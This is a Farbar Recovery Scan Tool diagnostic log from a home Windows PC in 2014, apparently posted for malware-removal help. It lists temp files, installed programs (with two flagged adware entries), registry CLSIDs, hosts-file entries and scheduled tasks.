C:\Users\Bill\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpvj9mxx.dll
C:\Users\Bill\AppData\Local\Temp\jre-6u23-windows-i586-iftw-rv.exe
C:\Users\Bill\AppData\Local\Temp\jre-6u26-windows-i586-iftw-rv.exe
C:\Users\Bill\AppData\Local\Temp\jre-6u33-windows-i586-iftw.exe
C:\Users\Bill\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe
C:\Users\Bill\AppData\Local\Temp\jre-7u21-windows-i586-iftw.exe
C:\Users\Bill\AppData\Local\Temp\SecurityScan_Release.exe
C:\Users\Dylan\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe
C:\Users\Dylan\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe
C:\Users\Hannah\AppData\Local\Temp\AutoRun.exe
C:\Users\Hannah\AppData\Local\Temp\AutoRunGUI.dll
C:\Users\Hannah\AppData\Local\Temp\EBU63AA.exe
C:\Users\Hannah\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe
C:\Users\Hannah\AppData\Local\Temp\optprosetup.exe
C:\Users\Hannah\AppData\Local\Temp\utt709F.tmp.exe
C:\Users\Nick\AppData\Local\Temp\eauninstall.exe
C:\Users\Nick\AppData\Local\Temp\jre-7u55-windows-i586-iftw.exe
C:\Users\Nick\AppData\Local\Temp\SimCity 4 Deluxe_uninst.exe
C:\Users\Nick\AppData\Local\Temp\_isB08.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-11-01 01:07

==================== End Of Log ============================

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 01-11-2014
Ran by Nick at 2014-11-01 10:09:04
Running from C:\Users\Nick\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: avast! Antivirus (Disabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Disabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKCU\...\uTorrent) (Version: 3.3.1.30017 - BitTorrent Inc.)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Avast Free Antivirus (HKLM\...\Avast) (Version: 10.0.2206 - AVAST Software)
FlaashCoupon (HKLM\...\{8B114619-78B7-1CFF-55EF-74266954F883}) (Version:  - FlAShCOaupoun) <==== ATTENTION
GitHub (HKCU\...\5f7eb300e2ea4ebf) (Version: 1.2.3.0 - GitHub, Inc.)
Google Talk (remove only) (HKCU\...\{226b64e8-dc75-4eea-a6c8-abcb496320f2}-Google Talk) (Version:  - )
join.me (HKCU\...\JoinMe) (Version: 1.3.1.426 - LogMeIn, Inc.)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.0.285.6 - McAfee, Inc.)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM\...\{8FB1B528-E260-451E-9B55-E9152F94B80B}) (Version: 3.2.3.0 - Microsoft Corporation)
Microsoft Help Viewer 1.0 (HKLM\...\Microsoft Help Viewer 1.0) (Version: 1.0.30319 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM\...\{4E968D9C-21A7-4915-B698-F7AEB913541D}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 ENU (HKLM\...\{3A9FC03D-C685-4831-94CF-4EDFD3749497}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM\...\{2A2F3AE8-246A-4252-BB26-1BEB45627074}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft Visual C# 2010 Express - ENU (HKLM\...\Microsoft Visual C# 2010 Express - ENU) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4974 (HKLM\...\{B7E38540-E355-3503-AFD7-635B2F2F76E1}) (Version: 9.0.30729.4974 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 ADO.NET Entity Framework Tools (HKLM\...\{14DD7530-CCD2-3798-B37D-3839ED6A441C}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft WSE 3.0 Runtime (HKLM\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
Microsoft XNA Framework Redistributable 4.0 (HKLM\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Microsoft XNA Game Studio 4.0 (HKLM\...\XNA Game Studio 4.0) (Version: 4.0.20823.0 - Microsoft Corporation)
Microsoft XNA Game Studio Platform Tools (HKLM\...\{0666E46E-A860-4353-BE6D-13AA72FABB57}) (Version: 1.3.0.0 - Microsoft Corporation)
Mozilla Firefox 33.0 (x86 en-US) (HKLM\...\Mozilla Firefox 33.0 (x86 en-US)) (Version: 33.0 - Mozilla)
RealNetworks - Microsoft Visual C++ 2008 Runtime (Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden
SaalesCheckEr (HKLM\...\{CC17A332-9555-AD95-3985-0BDD9BF0EC71}) (Version:  - "")
Sean O'Connor's Windows Games (HKLM\...\Sean O'Connor's Windows Games_is1) (Version:  - Sean O'Connor's Windows Games)
ShockWave Map Pack (HKCU\...\ShockWave Map Pack) (Version:  - )
Spotify (HKCU\...\Spotify) (Version: 0.8.3.222.g317ab79d - Spotify AB)
UltraVnc (HKLM\...\Ultravnc2_is1) (Version: 1.2.0.3 - uvnc bvba)
unicoupons (HKLM\...\{6F10CA8F-97E3-48FB-9003-3EE8E9050577}) (Version:  - unicoupons) <==== ATTENTION
Visual Studio 2010 Tools for SQL Server Compact 3.5 SP2 ENU (HKLM\...\{112C23F2-C036-4D40-BED4-0CB47BF5555C}) (Version: 4.0.8080.0 - Microsoft Corporation)
Windows 7 USB/DVD Download Tool (HKLM\...\{CCF298AF-9CE1-4B26-B251-486E98A34789}) (Version: 1.0.30 - Microsoft Corporation)
Windows Installer Clean Up (HKLM\...\{121634B0-2F4B-11D3-ADA3-00C04F52DD52}) (Version: 3.00.00.0000 - Microsoft Corporation)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Media Player Firefox Plugin (HKLM\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{0507EEDE-3AE7-49c7-BF37-0EB4A62D8638}\localserver32 -> C:\Users\Nick\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{31261F21-2B16-45EE-BEAB-07C4CFA18B65}\InprocServer32 -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{33b07fd4-5917-43e1-968d-4c79231836bf}\localserver32 -> C:\Users\Nick\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.23.9\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{39125640-8D80-11DC-A2FE-C5C455D89593}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Google Talk Plugin\googletalkax.dll (Google)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.22.3\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.21.165\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{A8F086C3-2497-4229-82FE-586F2D326F95}\localserver32 -> C:\Users\Nick\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{AB9F4455-E591-4132-A386-0B91EAEDB96C}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Google Talk Plugin\o1dax.dll (Google)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{BDC217C5-ED16-11CD-956C-0000C04E4C0A}\InprocServer32 -> C:\Windows\System32\TABCTL32.OCX (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{d33f3ced-d7d5-44f1-a9fe-6927dabb1934}\localserver32 -> C:\Users\Nick\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{EB06378B-ABB6-4B3C-9B40-D488DD8A6E93}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.22.5\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{F9043C85-F6F2-101A-A3C9-08002B2F49FB}\InprocServer32 -> C:\Windows\system32\COMDLG32.OCX (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1003_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{0507EEDE-3AE7-49c7-BF37-0EB4A62D8638}\localserver32 -> C:\Users\Bill\AppData\Roaming\Google\Google Talk\googletalk.exe No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> "C:\Users\Nick\AppData\Local\Google\Update\1.3.23.9\GoogleUpdateOnDemand.exe" No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> "C:\Users\Nick\AppData\Local\Google\Update\1.3.23.9\GoogleUpdateOnDemand.exe" No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{31261F21-2B16-45EE-BEAB-07C4CFA18B65}\InprocServer32 -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{33b07fd4-5917-43e1-968d-4c79231836bf}\localserver32 -> C:\Users\Bill\AppData\Roaming\Google\Google Talk\googletalk.exe No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Bill\AppData\Local\Google\Update\1.3.23.9\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{39125640-8D80-11DC-A2FE-C5C455D89593}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Google Talk Plugin\googletalkax.dll (Google)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{3C4F3BE3-47EB-101B-A3C9-08002B2F49FB}\InprocServer32 -> C:\Windows\system32\comdlg32.ocx (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{3C4F3BE5-47EB-101B-A3C9-08002B2F49FB}\InprocServer32 -> C:\Windows\system32\comdlg32.ocx (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{3C4F3BE7-47EB-101B-A3C9-08002B2F49FB}\InprocServer32 -> C:\Windows\system32\comdlg32.ocx (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> "C:\Users\Nick\AppData\Local\Google\Update\1.3.23.9\GoogleUpdateOnDemand.exe" No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{7629CFA2-3FE5-101B-A3C9-08002B2F49FB}\InprocServer32 -> C:\Windows\system32\comdlg32.ocx (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{7629CFA4-3FE5-101B-A3C9-08002B2F49FB}\InprocServer32 -> C:\Windows\system32\comdlg32.ocx (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{7DA06D40-54A0-11CF-A521-0080C77A7786}\InprocServer32 -> C:\Windows\system32\tabctl32.ocx (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}\InprocServer32 -> C:\Users\Bill\AppData\Local\Google\Update\1.3.22.3\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}\InprocServer32 -> C:\Users\Bill\AppData\Local\Google\Update\1.3.21.165\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{A8F086C3-2497-4229-82FE-586F2D326F95}\localserver32 -> C:\Users\Bill\AppData\Roaming\Google\Google Talk\googletalk.exe No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{AB9F4455-E591-4132-A386-0B91EAEDB96C}\InprocServer32 -> C:\Users\Nick\AppData\Local\Google\Google Talk Plugin\o1dax.dll (Google)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{BDC217C5-ED16-11CD-956C-0000C04E4C0A}\InprocServer32 -> C:\Windows\system32\tabctl32.ocx (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Users\Bill\AppData\Local\Google\Update\1.3.23.9\npGoogleUpdate3.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Users\Bill\AppData\Local\Google\Update\1.3.23.9\npGoogleUpdate3.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{d33f3ced-d7d5-44f1-a9fe-6927dabb1934}\localserver32 -> C:\Users\Bill\AppData\Roaming\Google\Google Talk\googletalk.exe No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> "C:\Users\Nick\AppData\Local\Google\Update\1.3.23.9\GoogleUpdateOnDemand.exe" No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Bill\AppData\Local\Google\Update\1.3.23.9\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{EB06378B-ABB6-4B3C-9B40-D488DD8A6E93}\InprocServer32 -> C:\Users\Bill\AppData\Local\Google\Update\1.3.22.5\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{F9043C85-F6F2-101A-A3C9-08002B2F49FB}\InprocServer32 -> C:\Windows\system32\comdlg32.ocx (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bill\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bill\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bill\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bill\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bill\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bill\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bill\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2927482541-673307907-4085399872-1004_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bill\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)

==================== Restore Points  =========================

30-10-2014 07:00:02 Scheduled Checkpoint
31-10-2014 07:00:02 Scheduled Checkpoint
31-10-2014 09:27:23 Windows Update
01-11-2014 07:00:02 Scheduled Checkpoint

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2006-11-02 03:23 - 2013-03-26 14:20 - 00001367 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1                activate.adobe.com
127.0.0.1                practivate.adobe.com
127.0.0.1                ereg.adobe.com
127.0.0.1                activate.wip3.adobe.com
127.0.0.1                wip3.adobe.com
127.0.0.1                3dns-3.adobe.com
127.0.0.1                3dns-2.adobe.com
127.0.0.1                adobe-dns.adobe.com
127.0.0.1                adobe-dns-2.adobe.com
127.0.0.1                adobe-dns-3.adobe.com
127.0.0.1                ereg.wip3.adobe.com
127.0.0.1                activate-sea.adobe.com
127.0.0.1                wwis-dubc1-vip60.adobe.com
127.0.0.1                activate-sjc0.adobe.com
127.0.0.1                               adobe.activate.com


==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {075F7B0C-8858-426A-81EA-5161F4D13E82} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages
Task: {2EF1A2C3-210D-4AFD-BEB7-E51E7FD69C0C} - System32\Tasks\Microsoft\Windows\MobilePC\TMM
Task: {447EF652-81EB-4A87-AE24-237265C7BD4E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003UA => C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe [2013-04-10] (Google Inc.)
Task: {5351DC86-6954-4477-A51C-ECDA4CD9C527} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-10-26] (Adobe Systems Incorporated)
Task: {612A9231-466D-4733-98F5-24DE2C16CA7C} - System32\Tasks\{5735D215-420F-46D5-93FD-87F7CCE68FB1} => Firefox.exe http://ui.skype.com/ui/0/6.3.73.105.457/en/abandoninstall?page=tsProgressBar
Task: {74F446E1-431E-4F82-AE81-3A9F6D649CC7} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI
Task: {99ABE7F2-15E4-4DC2-869C-5A32245F7529} - System32\Tasks\TS => C:\Windows\System32\tsdiscon.exe [2009-04-10] (Microsoft Corporation)
Task: {9A56A77B-6296-44AE-B933-8F38D08DA943} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {A302FD2A-8C61-40E8-A448-DEF007F98AF8} - System32\Tasks\{7107BA25-B7A3-444D-A29C-5A8A793D34F7} => Firefox.exe http://ui.skype.com/ui/0/6.3.73.105.457/en/abandoninstall?page=tsWLM
Task: {C23F38D7-618A-42E1-B944-5F3580DB4128} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2010-11-20] (Google Inc.)
Task: {D1145987-C734-479D-A3EE-CD7FBA8A6852} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-2927482541-673307907-4085399872-1003 => C:\Program Files\Real\RealUpgrade\RealUpgrade.exe [2012-11-30] (RealNetworks, Inc.)
Task: {D5C071A0-B9CA-4157-A690-4AD040A8E292} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003Core => C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe [2013-04-10] (Google Inc.)
Task: {DD987E28-0257-46F3-BE19-DFDECFAB211D} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-2927482541-673307907-4085399872-1003 => C:\Program Files\Real\RealUpgrade\RealUpgrade.exe [2012-11-30] (RealNetworks, Inc.)
Task: {E986862A-C64E-4935-AE99-A25AE314983F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2012-11-23] (Piriform Ltd)
Task: {EB51F75A-9338-40EC-B51D-99B484C578DA} - System32\Tasks\avast! Emergency Update => C:\Program Files\Alwil Software\Avast5\AvastEmUpdate.exe [2014-10-26] (AVAST Software)
Task: {F39781AF-5991-4E01-98DC-BB813D6A14B8} - System32\Tasks\{3AEB2CCF-2276-4279-B862-1B6ECC1BBA06} => Firefox.exe http://ui.skype.com/ui/0/6.3.73.105.457/en/abandoninstall?page=tsProgressBar
Task: {F74350EB-FFEF-4536-A95D-BF6CEA19C566} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2010-11-20] (Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003Core.job => C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003UA.job => C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\User_Feed_Synchronization-{C479CE1A-76B9-4D6F-8D71-575C334B2024}.job => C:\Windows\system32\msfeedssync.exe
